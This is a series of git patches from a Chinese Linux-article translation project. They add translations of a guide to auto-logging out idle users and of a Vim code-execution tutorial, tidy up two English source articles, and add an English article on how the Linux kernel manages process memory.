-ClientAliveCountMax 0
-```
-
-Save and close this file. Restart sshd service to take effect the changes.
-```
-$ sudo systemctl restart sshd
-```
-
-Now, ssh to this system from a remote system. After 100 seconds, the ssh session will be automatically closed and you will see the following message:
-```
-$ Connection to 192.168.43.2 closed by remote host.
-Connection to 192.168.43.2 closed.
-```
-
-Now, whoever access this system from a remote system via SSH will automatically be logged out after an inactivity of 100 seconds.
-
-Hope this helps. I will be soon here with another useful guide. If you find our guides helpful, please share them on your social, professional networks and support OSTechNix!
-
-Cheers!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/auto-logout-inactive-users-period-time-linux/
-
-作者:[SK][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
diff --git a/translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md b/translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
new file mode 100644
index 0000000000..10decaada3
--- /dev/null
+++ b/translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
@@ -0,0 +1,131 @@
+如何在 Linux 上让一段时间不活动的用户自动登出
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/logout-720x340.jpg)
+
+让我们想象这么一个场景。你有一台服务器,经常被网络中各个系统上的很多用户访问。有可能某些用户忘记登出,使会话一直处于连接状态。我们都知道,留下一个处于连接状态的用户会话是一件多么危险的事情。有些用户可能会借此故意做一些损坏系统的事情。而你,作为一名系统管理员,会去每个系统上都检查一遍用户是否已登出吗?其实这完全没必要,而且若网络中有成百上千台机器,这也太耗时了。不过,你可以让用户在本机或 SSH 会话上超过一定时间不活跃时自动登出。本教程就将教你如何在类 Unix 系统上实现这一点。一点都不难,跟我做吧。
+
+### 在 Linux 上实现一段时间后自动登出非活动用户
+
+有三种实现方法。让我们先来看第一种方法。
+
+#### 方法 1:
+
+编辑 **~/.bashrc** 或 **~/.bash_profile** 文件:
+```
+$ vi ~/.bashrc
+```
+或,
+```
+$ vi ~/.bash_profile
+```
+
+将下面行加入其中。
+```
+TMOUT=100
+```
+
+这会让用户在停止动作 100 秒后自动登出。你可以根据需要定义这个值。保存并关闭文件。
+
+运行下面命令让更改生效:
+```
+$ source ~/.bashrc
+```
+或,
+```
+$ source ~/.bash_profile
+```
+
+现在让会话闲置 100 秒。100 秒不活动后,你会看到下面这段信息,并且用户会自动退出会话。
+```
+timed out waiting for input: auto-logout
+Connection to 192.168.43.2 closed.
+```
+
+该设置可以轻易地被用户修改,因为 `~/.bashrc` 文件归用户自己所有。
+
+要修改或者删除超时设置,只需要删掉上面添加的行,然后执行 `source ~/.bashrc` 命令让修改生效。
+
+此外,用户也可以运行下面命令来禁用超时:
+```
+$ export TMOUT=0
+```
+或,
+```
+$ unset TMOUT
+```
+
+若你想阻止用户修改该设置,使用下面方法代替。
+
+#### 方法 2:
+
+以 root 用户登录。
+
+创建一个名为 `autologout.sh` 的新文件。
+```
+# vi /etc/profile.d/autologout.sh
+```
+
+加入下面内容:
+```
+TMOUT=100
+readonly TMOUT
+export TMOUT
+```
+
+保存并退出该文件。
+
+为它添加可执行权限:
+```
+# chmod +x /etc/profile.d/autologout.sh
+```
+
+现在,登出或者重启系统。非活动用户就会在 100 秒后自动登出了。普通用户即使想保留会话连接,也无法修改该配置。他们会在 100 秒后被强制退出。
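+
+可以简单验证一下:由于 `TMOUT` 已被声明为只读,普通用户试图覆盖它时会直接报错(下面的输出只是示意,具体提示措辞可能因 bash 版本而异):
+
+```
+$ export TMOUT=0
+bash: TMOUT: readonly variable
+```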
+
+这两种方法对本地会话和远程会话都适用(即本地登陆的用户和远程系统上通过 SSH 登陆的用户)。下面让我们来看看如何实现只自动登出非活动的 SSH 会话,而不自动登出本地会话。
+
+#### 方法 3:
+
+在这种方法中,我们只会让 SSH 会话用户在一段时间不活动后自动登出。
+
+编辑 `/etc/ssh/sshd_config` 文件:
+```
+$ sudo vi /etc/ssh/sshd_config
+```
+
+添加/修改下面行:
+```
+ClientAliveInterval 100
+ClientAliveCountMax 0
+```
+
+保存并退出该文件。重启 sshd 服务让改动生效。
+```
+$ sudo systemctl restart sshd
+```
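+
+如果想确认 sshd 实际生效的取值,可以用 `sshd -T` 输出解析后的有效配置再过滤(输出格式可能因版本而略有差异):
+
+```
+$ sudo sshd -T | grep -i clientalive
+clientaliveinterval 100
+clientalivecountmax 0
+```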
+
+现在,在远程系统通过 ssh 登陆该系统。100 秒后,ssh 会话就会自动关闭了,你也会看到下面消息:
+```
+$ Connection to 192.168.43.2 closed by remote host.
+Connection to 192.168.43.2 closed.
+```
+
+现在,任何人从远程系统通过 SSH 登陆本系统,都会在 100 秒不活动后自动登出了。
+
+希望本文能对你有所帮助。我马上还会写另一篇实用指南。如果你觉得我们的指南有用,请在您的社交网络上分享,支持 OSTechNix!
+
+祝您好运!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/auto-logout-inactive-users-period-time-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
From a9596f9fe2b41ef856624ae20f63f016944511ae Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 13:07:57 +0800
Subject: [PATCH 191/371] fix the case problem
---
...4 Tlog - A Tool to Record - Play Terminal IO and Sessions.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
index 09ed8ec879..bdbeecc563 100644
--- a/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
+++ b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
@@ -74,7 +74,7 @@ This command reads the previously recorded file tlog.log from the file path ment
Tlog is an open-source package which can be used for implementing centralized user session recording. This is mainly intended to be used as part of a larger user session recording solution but is designed to be independent and reusable.This tool can be a great help for recording everything users do and store it somewhere on the server side safe for the future reference. You can get more details about this package usage in this [documentation][3]. I hope this article is useful to you. Please post your valuable suggestions and comments on this.
### About Saheetha Shameer(the author)
-I'M Working As A Senior System Administrator. I'M A Quick Learner;Have A Slight Inclination Towards Following The Current;Emerging Trends In The Industry. My Hobbies Include Hearing Music;Playing Strategy Computer Games;Reading;Gardening. I Also Have A High Passion For Experimenting With Various Culinary Delights;
+I'm working as a Senior System Administrator. I'm a quick learner and have a slight inclination towards following the current and emerging trends in the industry. My hobbies include hearing music, playing strategy computer games, reading and gardening. I also have a high passion for experimenting with various culinary delights :-)
--------------------------------------------------------------------------------
From d0f6d5ff1e2e69b287761f22b3110f5a8819b986 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Tue, 9 Jan 2018 13:11:36 +0800
Subject: [PATCH 192/371] Translated by stevenzdg988
---
...n More Awesome With These Cool Features.md | 124 ------------------
...n More Awesome With These Cool Features.md | 109 +++++++++++++++
2 files changed, 109 insertions(+), 124 deletions(-)
delete mode 100644 sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
create mode 100644 translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
diff --git a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md b/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
deleted file mode 100644
index 05611d8482..0000000000
--- a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
+++ /dev/null
@@ -1,124 +0,0 @@
-Translating by stevenzdg988
-Making Vim Even More Awesome With These Cool Features
-======
-
-![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/making-vim-even-more-awesome-with-these-cool-features_orig.jpg)
-
-**Vim** is quite an integral part of Every [Linux Distribution][1] and the most useful tool (of course after the terminal) for Linux Users. At least, this theory holds for me. People might argue that for programming, Vim might not be a good choice as there are different IDEs or other sophisticated text editors like Sublime Text 3, Atom etc. which make the programming job pretty easier.
-
-#### My Thoughts
-
-But what I think is that Vim works the way we want it to right from the very start, while other editors make us work the way they have been designed, not the way we actually want them to work. I can’t say much about other editors cause I haven’t used them much ( I’m biased with Vim ).
-
-Anyway, Let’s make something out of Vim, that really does the Job god damn well.
-
-### Vim for Programming
-
-#### Executing the Code
-
-Consider a scenario, What we do when we are working on a C++ code on Vim and we need to compile and run it.
-
-(a). We get back to the terminal either through (Ctrl + Z) thing or we just save and quit it (:wq).
-
-(b). And the trouble’s ain’t over, we now need to type on something on terminal like this { g++ fileName.cxx }.
-
-
-
-(c). And after that execute it by typing { ./a.out } .
-
-Certainly a lot of things needed to be done in order to get our C++ code running over the shell. But it doesn’t seem to be a Vim way of doing this (as Vim always tends to keep almost everything under one/two keypresses). So, What is the Vim way of doing this stuff?
-
-#### The Vim Way
-
-Vim isn’t just a Text Editor, It is sort of a Programming Language for Editing Text. And that programming language that helps us extending the features of Vim is “VimScript”.
-
-So, with the help of VimScript, we can easily automate our task of Compiling and Running code with just a KeyPress.
-
- [![create functions in vim .vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png)][2]
-
-Above is a snippet out of my .vimrc configuration file where i created a function called CPP().
-
-#### Creating Functions in VimScript
-
-The syntax for creating a function in VimScript is pretty easy. It starts with keyword “
-
-**func**
-
-” and is followed by the name of Function [Function Name must start with a capital letter in VimScript, otherwise Vim will give an error]. And the end of the function is denoted by keyword “
-
-**endfunc**
-
-”.
-
-In the function’s body, you can see an
-
-**exec**
-
-statement, whatever you write after the exec keyword is executed over the Vim’s Command Mode (remember the thing starting with: at the bottom of Vim’s window). Now, the string that I passed to the exec is -
-
- [![vim functions commands & symbols](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png)][3]
-
-What happens is when this function is called, it first clears the Terminal Screen, so that only you will be viewing is your output, then it executes g++ over the filename you are working on and after that executes the a.out file formed due to compilation.
-
-Mapping Ctrl+r to run C++ code
-
--------------------------------------------------------------
-
-I mapped the statement :call CPP() to the key-combination (Ctrl+r) so that I could now press Ctrl+r to execute my C++ Code without manually typing :call CPP() and then pressing Enter.
-
-#### End Result
-
-We finally managed to find the Vim Way of doing that stuff. So now, You just hit a button and the output of your C++ code is on your screen, you don’t need to type all that lengthy thing. It sort of saves your time too.
-
-We can achieve this sort of functionality for other languages too.
-
- [![create function in vim for python](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png)][4]
-
-So For Python: Now you could press to interpret your code.
-
- [![create function in vim for java](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png)][5]
-
-For Java: You could now press , it will first Compile your Java Code then interpret your java class file and show you the output.
-
-### Picture ain’t over, Marching a level deep
-
-So, this was all about how you could manipulate things to work your way in Vim. Now, it comes to how we implement all this in Vim. We can use these Code Snippets directly in Vim and the other way around is by using the AutoCommands in Vim (autocmd’s). The beauty of autocmd is these commands need not be called by users, they execute by themselves at any certain condition which is provided by the user.
-
-What I want to do with this [autocmd] thing is that, instead of using different mappings to perform execution of codes in different Programming Languages, I would like a single mapping for execution for every language.
-
- [![autocmd in vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png)][6]
-
-What we did here is that I wrote autocommands for all the File Types for which I had functions for Executing the code.
-
-What’s going to happen is as soon as I open any buffer of any of the above-mentioned file types, Vim will automatically map my (Ctrl + r) to the function call and represents Enter Key, so that I don’t need to press “Enter key” everytime I press and alone does the job.
-
-To achieve this Functionality, you just need to add the function snippets to your [dot]vimrc and after that just put all those autocmds . And with that, the next time you open Vim, Vim will have all the Functionalities to execute all the Codes with the very same KeyBindings.
-
-### Conclusion
-
-That’s all for now. Hope this thing makes you love your Vim even more. I am currently exploring things in Vim, reading Documentations etc. and doing additions in [.vimrc] file and I will reach to you again when I will have something wonderful to share with you all.
-
-If you want to have a look at my current [.vimrc] file, here is the link to my Github account: [MyVimrc][7]
-
-.
-
-Please do Comment on how you liked the article.
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxandubuntu.com/home/making-vim-even-more-awesome-with-these-cool-features
-
-作者:[LINUXANDUBUNTU][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxandubuntu.com
-[1]:http://www.linuxandubuntu.com/home/category/distros
-[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png
-[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png
-[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png
-[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png
-[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png
-[7]:https://github.com/phenomenal-ab/VIm-Configurations/blob/master/.vimrc
diff --git a/translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md b/translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
new file mode 100644
index 0000000000..9a23cbf124
--- /dev/null
+++ b/translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
@@ -0,0 +1,109 @@
+用一些超酷的功能使 Vim 变得更强大
+======
+
+![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/making-vim-even-more-awesome-with-these-cool-features_orig.jpg)
+
+**Vim** 是每个 [Linux 发行版][1] 中不可或缺的一部分,也是 Linux 用户最常用的工具(当然,仅次于终端)。至少,这个说法对我来说是成立的。可能有人会反驳说,对于编程而言 Vim 未必是一个好的选择,因为有各种 IDE 以及像 `Sublime Text 3`、`Atom` 这样的高级文本编辑器,能让编程工作轻松许多。
+#### 我的感想
+
+但我认为,Vim 从一开始就按照我们想要的方式运作,而其他编辑器则让我们按照它们被设计好的方式工作,那实际上并不是我们想要的工作方式。我不好过多评价其他编辑器,因为我用得不多(我承认我对 Vim 有些偏爱)。
+
+不管怎样,让我们用 Vim 来做一些事情吧,它完全可以胜任。
+### 利用 Vim 进行程序设计
+
+#### 执行代码
+
+
+考虑一个场景:当我们用 Vim 编写 C++ 代码,并且需要编译和运行它时,该怎么做呢?
+
+(a). 我们通过 `(Ctrl + Z)` 返回到终端,或者利用 `(:wq)` 保存并退出。
+
+(b). 但是任务还没有结束,接下来需要在终端上输入类似于 `g++ fileName.cxx` 的命令进行编译。
+
+(c). 接下来需要键入 `./a.out` 执行它。
+
+
+为了让我们的 C++ 代码在 shell 中运行,需要做这么多事情。但这似乎不是 Vim 的做事方式(Vim 总是倾向于把几乎所有操作都用一两个按键搞定)。那么,用 Vim 的方式来做这些事情究竟应该怎么做?
+#### Vim 方式
+
+
+Vim 不仅仅是一个文本编辑器,它更像是一种用于编辑文本的编程语言。而这种帮助我们扩展 Vim 功能的编程语言,就是 “VimScript”(Linux 中国注:Vim 脚本)。
+
+因此,在 `VimScript` 的帮助下,我们可以只需一个按键轻松地将编译和运行代码的任务自动化。
+ [![create functions in vim .vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png)][2]
+
+
+以上是我的 `.vimrc` 配置文件中的一个片段,我在其中创建了一个名为 `CPP()` 的函数。
+#### 利用 VimScript 创建函数
+
+
+在 VimScript 中创建函数的语法非常简单:函数以关键字 **func** 开头,后面跟着函数名(在 VimScript 中,函数名必须以大写字母开头,否则 Vim 会报错),并以关键字 **endfunc** 结束。
+
+在函数体中可以看到一条 **exec** 语句。无论您在 **exec** 关键字之后写了什么,都会在 Vim 的命令模式下执行(也就是 Vim 窗口底部以 `:` 开头的那一行)。这里,我传递给 **exec** 的字符串是(Linux 中国注:即 `:!clear && g++ % && ./a.out`) -
+[![vim functions commands & symbols](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png)][3]
+
+
+当这个函数被调用时,它首先清除终端屏幕,这样你看到的就只有输出;接着对你正在编辑的文件运行 `g++` 进行编译,然后运行上一步编译生成的 `a.out` 文件。
+
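+结合上面注释中给出的命令,这个函数大致相当于下面这样的片段(仅为示意代码,并非原文内容,具体请以截图和你自己的 `.vimrc` 为准):
+```
+" 编译并运行当前 C++ 文件的示意函数(假设系统中已安装 g++)
+func! CPP()
+    " 清屏后用 g++ 编译当前文件(% 代表当前文件名),再运行生成的 a.out
+    exec ":!clear && g++ % && ./a.out"
+endfunc
+```
+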
+#### 将 `Ctrl+r` 映射为运行 C++ 代码
+
+
+我把 `:call CPP()` 这条语句映射到了组合键 `Ctrl+r` 上,这样现在只需按下 `Ctrl+r` 就能执行我的 C++ 代码,而无需手动输入 `:call CPP()` 再按回车了。
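+这个映射写在 `.vimrc` 中大致是下面这个样子(同样只是示意写法,并非原文截图内容,按键也可以换成你喜欢的组合):
+```
+" 普通模式下,把 Ctrl+r 映射为调用上面定义的 CPP() 函数
+nnoremap <C-r> :call CPP()<CR>
+```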
+#### 最终结果
+
+
+我们终于找到了用 Vim 的方式来做这件事的方法。现在,你只需按一个键,你所编写的 C++ 代码的输出就会显示在屏幕上,再也不用键入那些冗长的命令了,这也节省了你的时间。
+
+我们也可以为其他语言实现这类功能。
+ [![create function in vim for python](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png)][4]
+
+
+对于 Python:您可以按下映射键来解释执行您的代码。
+ [![create function in vim for java](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png)][5]
+
+
+对于 Java:您现在可以按下映射键,它会先编译您的 Java 代码,然后解释执行您的 Java 类文件并显示输出。
+### 进一步提高
+
+
+所以,以上就是如何让 Vim 按照你的方式来工作。接下来我们看看怎样在 Vim 中把这一切实现。一种做法是把这些代码片段直接放进配置里使用,另一种做法是使用 Vim 的自动命令(`autocmd`)。`autocmd` 的优点在于这些命令无需用户手动调用,只要满足用户设定的条件,它们就会自动执行。
+
+我想用 autocmd 实现的是:不再为不同的程序设计语言使用不同的映射来执行代码,而是让所有语言共用同一个映射。
+ [![autocmd in vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png)][6]
+
+
+这里所做的是:为所有我已经定义了执行函数的文件类型,编写对应的自动命令。
+
+这样一来,只要我打开上述任一文件类型的缓冲区,Vim 就会自动把 `Ctrl + r` 映射到对应的函数调用上,映射末尾的 `<CR>` 代表回车键,因此我每次按下 `Ctrl + r` 之后不需要再手动按一次回车,单独按 `Ctrl + r` 就能完成任务。
+
+为了实现这个功能,您只需把这些函数片段添加到 `.vimrc` 文件中,然后把上述这些 `autocmd` 也一并加进去。这样,下一次打开 Vim 时,Vim 就具备了用同一组按键执行各种代码的全部功能。
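+下面是一段示意性的 autocmd 写法(并非原文内容,其中假设你已经按前文的方式为各语言定义了 `CPP()`、`Python()` 这样的函数):
+```
+" 针对不同的文件类型,把同一个按键映射到各自的执行函数上
+autocmd FileType cpp    nnoremap <buffer> <C-r> :call CPP()<CR>
+autocmd FileType python nnoremap <buffer> <C-r> :call Python()<CR>
+```
+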
+### 总结
+
+就这些了。希望这些能让你更爱 Vim。我目前还在探索 Vim 的各种功能,阅读文档、补充 `.vimrc` 文件,等有了新的成果我会再与大家分享。
+
+如果你想看看我现在的 `.vimrc` 文件,这是我的 GitHub 账户的链接:[MyVimrc][7]。
+
+欢迎在评论中告诉我你对这篇文章的看法。
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/making-vim-even-more-awesome-with-these-cool-features
+
+作者:[LINUXANDUBUNTU][a]
+译者:[stevenzdg988](https://github.com/stevenzdg988)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com
+[1]:http://www.linuxandubuntu.com/home/category/distros
+[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png
+[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png
+[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png
+[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png
+[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png
+[7]:https://github.com/phenomenal-ab/VIm-Configurations/blob/master/.vimrc
From 391c58704ec802489cbc72f48ee52ae040582700 Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 13:14:56 +0800
Subject: [PATCH 193/371] table && image"
---
...m Monitoring Tools Every SysAdmin Should Know.md | 13 ++++++++++++-
1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
index ec121398d0..0f8e48c826 100644
--- a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
+++ b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
@@ -13,11 +13,22 @@ Need to monitor Linux server performance? Try these built-in commands and a few
top command display Linux processes. It provides a dynamic real-time view of a running system i.e. actual process activity. By default, it displays the most CPU-intensive tasks running on the server and updates the list every five seconds.
+![](https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/top-Linux-monitoring-command.jpg)
+
#### Commonly Used Hot Keys With top Linux monitoring tools
Here is a list of useful hot keys:
-Hot KeyUsagetDisplays summary information off and on.mDisplays memory information off and on.ASorts the display by top consumers of various system resources. Useful for quick identification of performance-hungry tasks on a system.fEnters an interactive configuration screen for top. Helpful for setting up top for a specific task.oEnables you to interactively select the ordering within top.rIssues renice command.kIssues kill command.zTurn on or off color/mono
+| Hot Key | Usage |
+|---|---|
+| t | Displays summary information off and on. |
+| m | Displays memory information off and on. |
+| A | Sorts the display by top consumers of various system resources. Useful for quick identification of performance-hungry tasks on a system. |
+| f | Enters an interactive configuration screen for top. Helpful for setting up top for a specific task. |
+| o | Enables you to interactively select the ordering within top. |
+| r | Issues renice command. |
+| k | Issues kill command. |
+| z | Turn on or off color/mono |
[How do I Find Out Linux CPU Utilization?][1]
From f5db223d4ef7767b5a467506958551cb21478c93 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Tue, 9 Jan 2018 14:04:11 +0800
Subject: [PATCH 194/371] =?UTF-8?q?20180109-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0203 How the Kernel Manages Your Memory.md | 103 ++++++++++++++++++
1 file changed, 103 insertions(+)
create mode 100644 sources/tech/20090203 How the Kernel Manages Your Memory.md
diff --git a/sources/tech/20090203 How the Kernel Manages Your Memory.md b/sources/tech/20090203 How the Kernel Manages Your Memory.md
new file mode 100644
index 0000000000..9eb30b0b23
--- /dev/null
+++ b/sources/tech/20090203 How the Kernel Manages Your Memory.md
@@ -0,0 +1,103 @@
+How the Kernel Manages Your Memory
+============================================================
+
+
+After examining the [virtual address layout][1] of a process, we turn to the kernel and its mechanisms for managing user memory. Here is gonzo again:
+
+![Linux kernel mm_struct](http://static.duartes.org/img/blogPosts/mm_struct.png)
+
+Linux processes are implemented in the kernel as instances of [task_struct][2], the process descriptor. The [mm][3] field in task_struct points to the memory descriptor, [mm_struct][4], which is an executive summary of a program’s memory. It stores the start and end of memory segments as shown above, the [number][5] of physical memory pages used by the process (rss stands for Resident Set Size), the [amount][6] of virtual address space used, and other tidbits. Within the memory descriptor we also find the two work horses for managing program memory: the set of virtual memory areas and the page tables. Gonzo’s memory areas are shown below:
+
+![Kernel memory descriptor and memory areas](http://static.duartes.org/img/blogPosts/memoryDescriptorAndMemoryAreas.png)
+
+Each virtual memory area (VMA) is a contiguous range of virtual addresses; these areas never overlap. An instance of [vm_area_struct][7] fully describes a memory area, including its start and end addresses, [flags][8] to determine access rights and behaviors, and the [vm_file][9] field to specify which file is being mapped by the area, if any. A VMA that does not map a file is anonymous. Each memory segment above ( _e.g._ , heap, stack) corresponds to a single VMA, with the exception of the memory mapping segment. This is not a requirement, though it is usual in x86 machines. VMAs do not care which segment they are in.
+
+A program’s VMAs are stored in its memory descriptor both as a linked list in the [mmap][10] field, ordered by starting virtual address, and as a [red-black tree][11] rooted at the [mm_rb][12] field. The red-black tree allows the kernel to search quickly for the memory area covering a given virtual address. When you read file `/proc/pid_of_process/maps`, the kernel is simply going through the linked list of VMAs for the process and [printing each one][13].
+
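+As a quick aside (not part of the original walkthrough), you can see this list for yourself by dumping the VMAs of your current shell:
+```
+# Each line is one VMA: start-end addresses, permissions, offset, and the mapped file (if any)
+cat /proc/$$/maps
+```
+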
+In Windows, the [EPROCESS][14] block is roughly a mix of task_struct and mm_struct. The Windows analog to a VMA is the Virtual Address Descriptor, or [VAD][15]; they are stored in an [AVL tree][16]. You know what the funniest thing about Windows and Linux is? It’s the little differences.
+
+The 4GB virtual address space is divided into pages. x86 processors in 32-bit mode support page sizes of 4KB, 2MB, and 4MB. Both Linux and Windows map the user portion of the virtual address space using 4KB pages. Bytes 0-4095 fall in page 0, bytes 4096-8191 fall in page 1, and so on. The size of a VMA _must be a multiple of page size_ . Here’s 3GB of user space in 4KB pages:
+
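+If you want to check the page size on a running system (a small aside, assuming a typical glibc-based Linux install), `getconf` reports it:
+```
+# Prints the page size in bytes; 4096 on standard x86 configurations
+getconf PAGE_SIZE
+```
+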
+![4KB Pages Virtual User Space](http://static.duartes.org/img/blogPosts/pagedVirtualSpace.png)
+
+The processor consults page tables to translate a virtual address into a physical memory address. Each process has its own set of page tables; whenever a process switch occurs, page tables for user space are switched as well. Linux stores a pointer to a process’ page tables in the [pgd][17] field of the memory descriptor. To each virtual page there corresponds one page table entry (PTE) in the page tables, which in regular x86 paging is a simple 4-byte record shown below:
+
+![x86 Page Table Entry (PTE) for 4KB page](http://static.duartes.org/img/blogPosts/x86PageTableEntry4KB.png)
+
+Linux has functions to [read][18] and [set][19] each flag in a PTE. Bit P tells the processor whether the virtual page is present in physical memory. If clear (equal to 0), accessing the page triggers a page fault. Keep in mind that when this bit is zero, the kernel can do whatever it pleases with the remaining fields. The R/W flag stands for read/write; if clear, the page is read-only. Flag U/S stands for user/supervisor; if clear, then the page can only be accessed by the kernel. These flags are used to implement the read-only memory and protected kernel space we saw before.
+
+Bits D and A are for dirty and accessed. A dirty page has had a write, while an accessed page has had a write or read. Both flags are sticky: the processor only sets them, they must be cleared by the kernel. Finally, the PTE stores the starting physical address that corresponds to this page, aligned to 4KB. This naive-looking field is the source of some pain, for it limits addressable physical memory to [4 GB][20]. The other PTE fields are for another day, as is Physical Address Extension.
+
+A virtual page is the unit of memory protection because all of its bytes share the U/S and R/W flags. However, the same physical memory could be mapped by different pages, possibly with different protection flags. Notice that execute permissions are nowhere to be seen in the PTE. This is why classic x86 paging allows code on the stack to be executed, making it easier to exploit stack buffer overflows (it’s still possible to exploit non-executable stacks using [return-to-libc][21] and other techniques). This lack of a PTE no-execute flag illustrates a broader fact: permission flags in a VMA may or may not translate cleanly into hardware protection. The kernel does what it can, but ultimately the architecture limits what is possible.
+
+Virtual memory doesn’t store anything, it simply _maps_ a program’s address space onto the underlying physical memory, which is accessed by the processor as a large block called the physical address space. While memory operations on the bus are [somewhat involved][22], we can ignore that here and assume that physical addresses range from zero to the top of available memory in one-byte increments. This physical address space is broken down by the kernel into page frames. The processor doesn’t know or care about frames, yet they are crucial to the kernel because the page frame is the unit of physical memory management. Both Linux and Windows use 4KB page frames in 32-bit mode; here is an example of a machine with 2GB of RAM:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/physicalAddressSpace.png)
+
+In Linux each page frame is tracked by a [descriptor][23] and [several flags][24]. Together these descriptors track the entire physical memory in the computer; the precise state of each page frame is always known. Physical memory is managed with the [buddy memory allocation][25] technique, hence a page frame is free if it’s available for allocation via the buddy system. An allocated page frame might be anonymous, holding program data, or it might be in the page cache, holding data stored in a file or block device. There are other exotic page frame uses, but leave them alone for now. Windows has an analogous Page Frame Number (PFN) database to track physical memory.
+
+Let’s put together virtual memory areas, page table entries and page frames to understand how this all works. Below is an example of a user heap:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/heapMapped.png)
+
+Blue rectangles represent pages in the VMA range, while arrows represent page table entries mapping pages onto page frames. Some virtual pages lack arrows; this means their corresponding PTEs have the Present flag clear. This could be because the pages have never been touched or because their contents have been swapped out. In either case access to these pages will lead to page faults, even though they are within the VMA. It may seem strange for the VMA and the page tables to disagree, yet this often happens.
+
+A VMA is like a contract between your program and the kernel. You ask for something to be done (memory allocated, a file mapped, etc.), the kernel says “sure”, and it creates or updates the appropriate VMA. But _it does not_ actually honor the request right away, it waits until a page fault happens to do real work. The kernel is a lazy, deceitful sack of scum; this is the fundamental principle of virtual memory. It applies in most situations, some familiar and some surprising, but the rule is that VMAs record what has been _agreed upon_ , while PTEs reflect what has _actually been done_ by the lazy kernel. These two data structures together manage a program’s memory; both play a role in resolving page faults, freeing memory, swapping memory out, and so on. Let’s take the simple case of memory allocation:
+
+![Example of demand paging and memory allocation](http://static.duartes.org/img/blogPosts/heapAllocation.png)
+
